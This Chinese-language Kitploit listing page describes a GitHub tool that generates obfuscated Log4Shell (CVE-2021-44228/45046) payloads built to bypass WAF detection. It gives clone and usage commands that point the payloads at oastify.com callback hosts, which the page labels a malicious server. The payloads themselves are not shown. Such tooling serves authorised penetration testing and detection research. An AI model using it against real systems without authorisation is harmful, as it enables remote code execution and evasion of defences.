Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Log4Shell-obfuscated-payloads-generator — 生成主要混淆或次要混淆的 CVE-2021-44228 或 CVE-2021-45046 载荷,以绕过 WAF 检测。 | Kitploit
工具/GitHubGitHub/r3kind1e/log4shell-obfuscated-payloads-generator
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用WAF绕过渗透测试
GitHubr3kind1e/log4shell-obfuscated-payloads-generator

Log4Shell-obfuscated-payloads-generator

生成主要混淆或次要混淆的 CVE-2021-44228 或 CVE-2021-45046 载荷,以绕过 WAF 检测。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
25244年前Kitploit 审核通过

Log4Shell-obfuscated-payloads-generator

Log4Shell-obfuscated-payloads-generator可以生成初级混淆的或二级混淆的CVE-2021-44228或CVE-2021-45046 payloads,以规避WAF检测。

Log4Shell-obfuscated-payloads-generator的设计思想

安装

root@kitploit:~
git clone https://github.com/r3kind1e/Log4Shell-obfuscated-payloads-generator.git

Log4Shell-obfuscated-payloads-generator在任何平台上都可以在Python 3.x版本中开箱即用。

Usage

要获取基本选项列表,请使用:

root@kitploit:~
python3 Log4Shell-obfuscated-payloads-generator.py -h

要获取使用示例,请使用:

root@kitploit:~
python3 Log4Shell-obfuscated-payloads-generator.py -hh

Screenshots

-h: 获取基本选项列表 help

-hh: 获取使用示例 usage-examples

使用单个选项生成有效负载,-s选项指定恶意服务器:

root@kitploit:~
--generate-primary-obfuscated-cve-2021-44228-payload 8 -s ck0pf4l6fmq4w0v17o7t894txk3arz.oastify.com

primary44228 burp-collaborator-client1

root@kitploit:~
--generate-primary-obfuscated-cve-2021-45046-payload 4 -s x53a0p6r07bphlgms9setupei5owcl.oastify.com

primary45046

root@kitploit:~
--generate-secondary-obfuscated-cve-2021-44228-payload 5 -s oia1rpap41mhxkp6rdbbywit1k7avz.oastify.com

secondary44228 burp-collaborator-client2

root@kitploit:~
--generate-secondary-obfuscated-cve-2021-45046-payload 5 -s 3vzg44n4hgzwaz2l4soqbbv8ezkq8f.oastify.com

secondary45046

使用多个选项来生成有效负载,-s 选项指定了恶意服务器:

root@kitploit:~
--generate-primary-obfuscated-cve-2021-44228-payload 4 --generate-secondary-obfuscated-cve-2021-44228-payload 4 -s exfr6fpfjr17ca4w63q1dmxjgam2ar.oastify.com

primary44228secondary44228

如果不使用-s选项指定恶意服务器,{{callback_host}}占位符将保留在生成的有效负载中:

root@kitploit:~
--generate-primary-obfuscated-cve-2021-44228-payload 3

primary44228-without-server

root@kitploit:~
--generate-primary-obfuscated-cve-2021-45046-payload 3 --generate-secondary-obfuscated-cve-2021-45046-payload 7

primary45046secondary45046

下载工具